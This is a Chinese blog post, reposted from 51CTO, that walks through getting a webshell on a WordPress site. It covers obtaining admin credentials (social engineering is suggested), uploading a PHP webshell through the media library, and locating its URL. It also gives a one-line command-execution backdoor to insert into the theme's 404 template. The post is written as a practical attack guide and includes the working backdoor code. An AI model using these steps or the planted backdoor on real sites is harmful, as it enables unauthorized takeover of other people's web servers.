wordpress拿WebShell
Simeon 安天365
WordPress是世界上用的最多的一款blog,可以说是世界流行,在前段时间爆出有一个任意文件漏洞,但由于时间很忙就没有进行测试,最近偶然拿到一个wordpress的blog,实际测试效果不错,下面将整个过程写出来跟朋友分享。
(一)获取管理员用户名和密码
关于如何获取管理员用户和密码不在本文的主要讨论范围,笔者有两点经验,一个是社工;另外一个就是已有信息的利用;在获取Webshell的情况下,对现有信息的分析和利用,有可能获取WordPress后台管理密码。WordPress后台位置一般为:http://www.xxx.com/blog/wp-admin,显示页面如图1所示,输入正确的用户名和密码后顺利登录,如图2所示。
图
1 WordPress
登录后台
图
2
成功登录后台
(二)寻找上传处
在
WordPress
管理页面的左边单击“媒体”
-
“新增媒体案”,接着就会出来一个上传的界面,在该界面中选择“
Browser
上傳功能”,如图
3
所示,直接选择
php
的
Webshell
上传即可。
图
3
获取上传页面
(三)浏览上传记录
上传
Webshell
后,有些系统装有杀毒软件会查杀部分
Webshell
,因此需要通过浏览记录来验证文件是否上传,系统在上传
WebShell
后会自动刷新,如果上传没有出现问题,则会如图
4
所示,上传文件显示在媒体库中。
图
4
查看上传的
Webshell
记录
(四)获取
Webshell
的直接地址
将鼠标移动到上传的
Webshell
记录上,可以看到有三个按钮“編輯”、“刪除”和“查看”,单击查看即可访问
Webshell
的具体页面,如图
5
所示,选择记录中的链接,该链接地址即为真正的
Webshell
地址。
图
5
获取上传的
Webshell
页面
(五)获取
WebShell
直接打开
Webshell
的地址,输入密码验证成功后,进入熟悉的
Webshell
界面,如图
6
所示,至此拿到了
WordPress
的
Webshell
。
图
6
获取
WebShell
(六)其他方法获取
Webshell
探讨
通过询问群里好友,感谢
cnbird
提供的一个方法,不过我测试后未能获取
Webshell
,不知是咋个回事,现将利用方法奉上:
(
1
)进入后台
(
2
)单击“外观”
-
“编辑”
-
“
404
模板”插入一句话木马程序代码
:<?php@system($_REQUEST[c]);?>
,如图
7
所示,插入后进行更新。
(
3
)使用连接地址
wordpress/wp-content/themes/default/404.php
进行连接。结果没有反应,很是郁闷!
图
7
插入一句话代码
本文转自 simeon2005 51CTO博客,原文链接:http://blog.51cto.com/simeon/277369